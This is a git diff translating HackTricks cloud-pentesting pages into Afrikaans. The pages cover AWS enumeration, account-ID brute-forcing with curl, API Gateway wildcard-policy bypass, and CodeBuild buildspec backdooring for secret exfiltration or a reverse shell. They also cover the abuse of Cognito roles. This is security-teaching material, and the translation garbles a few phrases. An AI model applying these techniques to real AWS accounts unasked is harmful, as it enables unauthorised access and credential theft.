diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
index a2f2e0c2f..daf55551a 100644
--- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -6,49 +6,48 @@
 
 ## EventBridge Scheduler
 
-**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
+**Amazon EventBridge Scheduler** is 'n volledig bestuurde, **serverless scheduler wat ontwerp is om take te skep, te loop, en te bestuur** op skaal. Dit stel jou in staat om miljoene take oor meer as 270 AWS-dienste en 6,000+ API-operasies te skeduleer, alles vanuit 'n sentrale diens. Met ingeboude betroubaarheid en geen infrastruktuur om te bestuur nie, vereenvoudig EventBridge Scheduler skedulering, verminder onderhoudskoste, en skaal outomaties om aan die vraag te voldoen. Jy kan cron of tariefuitdrukkings konfigureer vir herhalende skedules, eenmalige aanroepings stel, en buigsame afleweringsvensters met herhalingsopsies definieer, wat verseker dat take betroubaar afgelewer word gebaseer op die beskikbaarheid van afwaartse teikens.
 
-There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."&#x20;
+Daar is 'n aanvanklike limiet van 1,000,000 skedules per streek per rekening. Selfs die amptelike kwotas bladsy stel voor, "Dit word aanbeveel om eenmalige skedules te verwyder sodra hulle voltooi is."&#x20;
 
-### Types of Schedules
+### Tipes Skedules
 
-Types of Schedules in EventBridge Scheduler:
+Tipes Skedules in EventBridge Scheduler:
 
-1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
-2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
-3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
+1. **Eenmalige skedules** – Voer 'n taak uit op 'n spesifieke tyd, bv. 21 Desember om 7 VM UTC.
+2. **Tarief-gebaseerde skedules** – Stel herhalende take in op 'n frekwensie, bv. elke 2 uur.
+3. **Cron-gebaseerde skedules** – Stel herhalende take in met 'n cron-uitdrukking, bv. elke Vrydag om 4 NM.
 
-Two Mechanisms for Handling Failed Events:
+Twee Meganismes vir die Hantering van Mislukte Gebeure:
 
-1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
-2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
+1. **Herhalingsbeleid** – Definieer die aantal herhalingspogings vir 'n mislukte gebeurtenis en hoe lank om dit onverwerk te hou voordat dit as 'n mislukking beskou word.
+2. **Doodbriefmandjie (DLQ)** – 'n Standaard Amazon SQS-mandjie waar mislukte gebeurtenisse afgelewer word nadat herhalings uitgeput is. DLQ's help om probleme met jou skedule of sy afwaartse teiken op te los.
 
-### Targets
+### Teikens
 
-There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API.
+Daar is 2 tipes teikens vir 'n scheduler [**templatet (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), wat algemeen gebruik word en AWS het dit makliker gemaak om te konfigureer, en [**universel (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), wat gebruik kan word om enige AWS API aan te roep.
 
-**Templated targets** support the following services:
+**Templated teikens** ondersteun die volgende dienste:
 
 - CodeBuild – StartBuild
 - CodePipeline – StartPipelineExecution
 - Amazon ECS – RunTask
-  - Parameters: EcsParameters
+- Parameters: EcsParameters
 - EventBridge – PutEvents
-  - Parameters: EventBridgeParameters
+- Parameters: EventBridgeParameters
 - Amazon Inspector – StartAssessmentRun
 - Kinesis – PutRecord
-  - Parameters: KinesisParameters
+- Parameters: KinesisParameters
 - Firehose – PutRecord
 - Lambda – Invoke
 - SageMaker – StartPipelineExecution
-  - Parameters: SageMakerPipelineParameters
+- Parameters: SageMakerPipelineParameters
 - Amazon SNS – Publish
 - Amazon SQS – SendMessage
-  - Parameters: SqsParameters
+- Parameters: SqsParameters
 - Step Functions – StartExecution
 
-### Enumeration
-
+### Enumerasie
 ```bash
 # List all EventBridge Scheduler schedules
 aws scheduler list-schedules
@@ -65,10 +64,9 @@ aws scheduler get-schedule-group --name <group_name>
 # List tags for a specific schedule (helpful in identifying any custom tags or permissions)
 aws scheduler list-tags-for-resource --resource-arn <schedule_group_arn>
 ```
-
 ### Privesc
 
-In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **eventbridge scheduler toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -79,7 +77,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
index 0003290b4..b086ce9cf 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
@@ -1,58 +1,54 @@
-# AWS - Unauthenticated Enum & Access
+# AWS - Ongeauthentiseerde Enum & Toegang
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## AWS Credentials Leaks
+## AWS Kredensiaal Lekke
 
-A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\
-Some useful **tools**:
+'n Algemene manier om toegang of inligting oor 'n AWS-rekening te verkry, is deur **lekke te soek**. Jy kan lekke soek deur **google dorks**, die **openbare repos** van die **organisasie** en die **werkers** van die organisasie in **Github** of ander platforms te kontroleer, in **kredensiaal lekke databasisse** te soek... of in enige ander deel waar jy dink jy dalk inligting oor die maatskappy en sy wolk infrastruktuur kan vind.\
+Sommige nuttige **gereedskap**:
 
 - [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos)
 - [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos)
 - [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks)
 
-## AWS Unauthenticated Enum & Access
+## AWS Ongeauthentiseerde Enum & Toegang
 
-There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how:
+Daar is verskeie dienste in AWS wat geconfigureer kan word om 'n soort toegang aan die hele internet of aan meer mense as verwag te gee. Kyk hier hoe:
 
-- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md)
-- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md)
-- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md)
-- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md)
-- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md)
-- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md)
-- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md)
-- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md)
-- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md)
-- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md)
-- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md)
-- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md)
-- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md)
-- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md)
-- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md)
-- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md)
+- [**Rekeninge Ongeauthentiseerde Enum**](aws-accounts-unauthenticated-enum.md)
+- [**Cloud9 Ongeauthentiseerde Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+- [**Cloudfront Ongeauthentiseerde Enum**](aws-cloudfront-unauthenticated-enum.md)
+- [**Cloudsearch Ongeauthentiseerde Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+- [**Cognito Ongeauthentiseerde Enum**](aws-cognito-unauthenticated-enum.md)
+- [**DocumentDB Ongeauthentiseerde Enum**](aws-documentdb-enum.md)
+- [**EC2 Ongeauthentiseerde Enum**](aws-ec2-unauthenticated-enum.md)
+- [**Elasticsearch Ongeauthentiseerde Enum**](aws-elasticsearch-unauthenticated-enum.md)
+- [**IAM Ongeauthentiseerde Enum**](aws-iam-and-sts-unauthenticated-enum.md)
+- [**IoT Ongeauthentiseerde Toegang**](aws-iot-unauthenticated-enum.md)
+- [**Kinesis Video Ongeauthentiseerde Toegang**](aws-kinesis-video-unauthenticated-enum.md)
+- [**Media Ongeauthentiseerde Toegang**](aws-media-unauthenticated-enum.md)
+- [**MQ Ongeauthentiseerde Toegang**](aws-mq-unauthenticated-enum.md)
+- [**MSK Ongeauthentiseerde Toegang**](aws-msk-unauthenticated-enum.md)
+- [**RDS Ongeauthentiseerde Toegang**](aws-rds-unauthenticated-enum.md)
+- [**Redshift Ongeauthentiseerde Toegang**](aws-redshift-unauthenticated-enum.md)
+- [**SQS Ongeauthentiseerde Toegang**](aws-sqs-unauthenticated-enum.md)
+- [**S3 Ongeauthentiseerde Toegang**](aws-s3-unauthenticated-enum.md)
 
-## Cross Account Attacks
+## Kruisrekening Aanvalle
 
-In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed.
+In die praatjie [**Breek die Isolasie: Kruisrekening AWS Kw vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) word aangebied hoe sommige dienste enige AWS-rekening toegelaat het om toegang tot hulle te verkry omdat **AWS dienste sonder om rekening ID's te spesifiseer** toegelaat is.
 
-During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**:
+Tydens die praatjie spesifiseer hulle verskeie voorbeelde, soos S3-buckets wat **cloudtrail** (van **enige AWS** rekening) toelaat om **na hulle te skryf**:
 
 ![](<../../../images/image (260).png>)
 
-Other services found vulnerable:
+Ander dienste wat kwesbaar gevind is:
 
 - AWS Config
 - Serverless repository
 
-## Tools
+## Gereedskap
 
-- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
+- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT gereedskap. **Vind openbare hulpbronne** in AWS, Azure, en Google Cloud. Ondersteunde AWS dienste: Open / Beskermde S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, ens.)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
index 84c70ed0e..138a572cb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
@@ -4,12 +4,11 @@
 
 ## Account IDs
 
-If you have a target there are ways to try to identify account IDs of accounts related to the target.
+As jy 'n teiken het, is daar maniere om te probeer om rekening-ID's van rekeninge wat met die teiken verband hou, te identifiseer.
 
 ### Brute-Force
 
-You create a list of potential account IDs and aliases and check them
-
+Jy skep 'n lys van potensiële rekening-ID's en aliase en kontroleer hulle.
 ```bash
 # Check if an account ID exists
 curl -v https://<acount_id>.signin.aws.amazon.com
@@ -17,33 +16,28 @@ curl -v https://<acount_id>.signin.aws.amazon.com
 ## It also works from account aliases
 curl -v https://vodafone-uk2.signin.aws.amazon.com
 ```
-
 You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py).
 
 ### OSINT
 
-Look for urls that contains `<alias>.signin.aws.amazon.com` with an **alias related to the organization**.
+Soek na urls wat `<alias>.signin.aws.amazon.com` bevat met 'n **alias wat verband hou met die organisasie**.
 
 ### Marketplace
 
-If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used.
+As 'n verkoper **instansies in die marketplace het,** kan jy die eienaar id (rekening id) van die AWS rekening wat hy gebruik het, kry.
 
 ### Snapshots
 
-- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
-- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
-- Public AMIs (EC2 -> AMIs -> Public images)
+- Publieke EBS snapshots (EC2 -> Snapshots -> Publieke Snapshots)
+- RDS publieke snapshots (RDS -> Snapshots -> Alle Publieke Snapshots)
+- Publieke AMIs (EC2 -> AMIs -> Publieke beelde)
 
 ### Errors
 
-Many AWS error messages (even access denied) will give that information.
+Baie AWS foutboodskappe (selfs toegang geweier) sal daardie inligting gee.
 
 ## References
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
index 5a69bebe0..a854719a8 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
@@ -1,60 +1,52 @@
-# AWS - API Gateway Unauthenticated Enum
+# AWS - API Gateway Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### API Invoke bypass
-
-According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
+### API Aanroep omseiling
 
+Volgens die praatjie [Aanval Vektore vir API's wat AWS API Gateway Lambda Authorizers Gebruik - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), kan Lambda Authorizers geconfigureer word **met IAM-sintaksis** om toestemmings te gee om API-eindpunte aan te roep. Dit is geneem [**uit die dokumentasie**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Permission",
-      "Action": ["execute-api:Execution-operation"],
-      "Resource": [
-        "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
-      ]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Permission",
+"Action": ["execute-api:Execution-operation"],
+"Resource": [
+"arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
+]
+}
+]
 }
 ```
+Die probleem met hierdie manier om toestemmings te gee om eindpunte aan te roep, is dat die **"\*" impliseer "enigiets"** en daar is **geen verdere regex-sintaksis ondersteun** nie.
 
-The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**.
+Sommige voorbeelde:
 
-Some examples:
-
-- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example.
+- 'n Reël soos `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` om elke gebruiker toegang te gee tot `/dashboard/user/{username}` sal hulle toegang gee tot ander roetes soos `/admin/dashboard/createAdmin` byvoorbeeld.
 
 > [!WARNING]
-> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\
+> Let daarop dat **"\*" nie stop om uit te brei met skewe streepies nie**, daarom, as jy "\*" in api-id gebruik byvoorbeeld, kan dit ook "enige fase" of "enige metode" aandui solank die finale regex steeds geldig is.\
 > So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\
-> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example.
+> Kan 'n posversoek valideer om die toetsfase na die pad `/prod/GET/dashboard/admin` byvoorbeeld.
 
-You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted.
+Jy moet altyd duidelik hê wat jy wil toelaat om toegang te hê en dan kyk of ander scenario's moontlik is met die toestemmings wat gegee is.
 
-For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints).
+Vir meer inligting, behalwe die [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), kan jy kode vind om outeurs te implementeer in [**hierdie amptelike aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints).
 
-### IAM Policy Injection
+### IAM Beleid Inspuiting
 
-In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**.
-
-### Public URL template
+In dieselfde [**praatjie** ](https://www.youtube.com/watch?v=bsPKk7WDOnE) word die feit blootgestel dat as die kode **gebruikersinvoer** gebruik om die **IAM-beleide** te **genereer**, wildcard (en ander soos "." of spesifieke strings) daarin ingesluit kan word met die doel om **beperkings te omseil**.
 
+### Publieke URL-sjabloon
 ```
 https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
 ```
+### Kry rekening ID van openbare API Gateway URL
 
-### Get Account ID from public API Gateway URL
+Net soos met S3-buckets, Data Exchange en Lambda URL-gateways, is dit moontlik om die rekening ID van 'n rekening te vind deur die **`aws:ResourceAccount`** **Beleidstoestand Sleutel** van 'n openbare API Gateway URL te misbruik. Dit word gedoen deur die rekening ID een karakter op 'n slag te vind deur wildcard-teken in die **`aws:ResourceAccount`** afdeling van die beleid te misbruik.\
+Hierdie tegniek laat ook toe om **waardes van etikette** te verkry as jy die etiket sleutel ken (daar is 'n paar standaard interessante).
 
-Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
index 0284e2514..64c03bec5 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://{random_id}.cloudfront.net
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
index d95410a62..17cbc0d84 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
@@ -1,10 +1,10 @@
-# AWS - CodeBuild Unauthenticated Access
+# AWS - CodeBuild Ongeverifieerde Toegang
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## CodeBuild
 
-For more info check this page:
+Vir meer inligting, kyk na hierdie bladsy:
 
 {{#ref}}
 ../aws-services/aws-codebuild-enum.md
@@ -12,28 +12,22 @@ For more info check this page:
 
 ### buildspec.yml
 
-If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**.
+As jy skrywe toegang oor 'n repository wat 'n lêer genaamd **`buildspec.yml`** bevat, kan jy hierdie lêer **backdoor**, wat die **opdragte spesifiseer wat binne 'n CodeBuild projek uitgevoer gaan word** en die geheime ontgin, wat gedoen word, en ook die **CodeBuild IAM rol geloofsbriewe** kompromenteer.
 
-Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example.
+Let daarop dat selfs al is daar geen **`buildspec.yml`** lêer nie, maar jy weet Codebuild word gebruik (of 'n ander CI/CD), kan **modifisering van 'n paar wettige kode** wat uitgevoer gaan word, jou ook 'n omgekeerde shell gee byvoorbeeld.
 
-For some related information you could check the page about how to attack Github Actions (similar to this):
+Vir sommige verwante inligting kan jy die bladsy oor hoe om Github Actions aan te val (soortgelyk aan hierdie) kyk:
 
 {{#ref}}
 ../../../pentesting-ci-cd/github-security/abusing-github-actions/
 {{#endref}}
 
-## Self-hosted GitHub Actions runners in AWS CodeBuild <a href="#action-runner" id="action-runner"></a>
-
-As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this:
+## Self-gehoste GitHub Actions runners in AWS CodeBuild <a href="#action-runner" id="action-runner"></a>
 
+Soos [**aangegee in die dokumentasie**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), is dit moontlik om **CodeBuild** te konfigureer om **self-gehoste Github aksies** te laat loop wanneer 'n werksvloei binne 'n Github repo geconfigureer word, geaktiveer word. Dit kan opgespoor word deur die CodeBuild projekkonfigurasie te kontroleer omdat die **`Event type`** moet bevat: **`WORKFLOW_JOB_QUEUED`** en in 'n Github Werksvloei omdat dit 'n **self-gehoste** runner soos hierdie sal kies:
 ```bash
 runs-on: codebuild-<project-name>-${{ github.run_id }}-${{ github.run_attempt }}
 ```
-
-This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached.
+Hierdie nuwe verhouding tussen Github Actions en AWS skep 'n ander manier om AWS vanaf Github te kompromitteer, aangesien die kode in Github in 'n CodeBuild-projek met 'n IAM-rol aangeheg sal wees.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
index 6f26f3a34..1a10d32bd 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
@@ -4,9 +4,9 @@
 
 ## Unauthenticated Cognito
 
-Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**.
+Cognito is 'n AWS-diens wat ontwikkelaars in staat stel om **hul app-gebruikers toegang tot AWS-dienste** te **gee**. Ontwikkelaars sal **IAM-rolle aan geverifieerde gebruikers** in hul app toeken, en hulle kan ook 'n **IAM-rol aan nie-geverifieerde gebruikers** toeken.
 
-For basic info about Cognito check:
+Vir basiese inligting oor Cognito, kyk:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
@@ -14,39 +14,31 @@ For basic info about Cognito check:
 
 ### Identity Pool ID
 
-Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\
-Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges.
+Identiteitspoele kan **IAM-rolle aan nie-geverifieerde gebruikers** toeken wat net **die Identiteitspoel-ID** ken (wat redelik algemeen is om te **vind**), en 'n aanvaller met hierdie inligting kan probeer om **toegang tot daardie IAM-rol** te verkry en dit te misbruik.\
+Boonop kan IAM-rolle ook toegeken word aan **geverifieerde gebruikers** wat toegang tot die Identiteitspoel het. As 'n aanvaller **'n gebruiker kan registreer** of reeds **toegang tot die identiteitsverskaffer** het wat in die identiteitspoel gebruik word, kan jy toegang verkry tot die **IAM-rol wat aan geverifieerde** gebruikers gegee word en sy voorregte misbruik.
 
-[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md).
+[**Kyk hoe om dit hier te doen**](../aws-services/aws-cognito-enum/cognito-identity-pools.md).
 
 ### User Pool ID
 
-By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration).
+Standaard laat Cognito toe om **nuwe gebruikers te registreer**. Om 'n gebruiker te kan registreer, kan jou **toegang** gee tot die **onderliggende toepassing** of tot die **geverifieerde IAM-toegang rol van 'n Identiteitspoel** wat die Cognito-gebruikerspoel as identiteitsverskaffer aanvaar. [**Kyk hoe om dit hier te doen**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration).
 
 ### Pacu modules for pentesting and enumeration
 
-[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+[Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS-uitbuitingsraamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito-bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en ook die skepping van gebruikers outomatiseer (insluitend MFA-ondersteuning) en voorregte-eskalasie gebaseer op aanpasbare aangepaste attributen, bruikbare identiteitspoelakkredite, aanneembare rolle in id tokens, ens.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy.
 
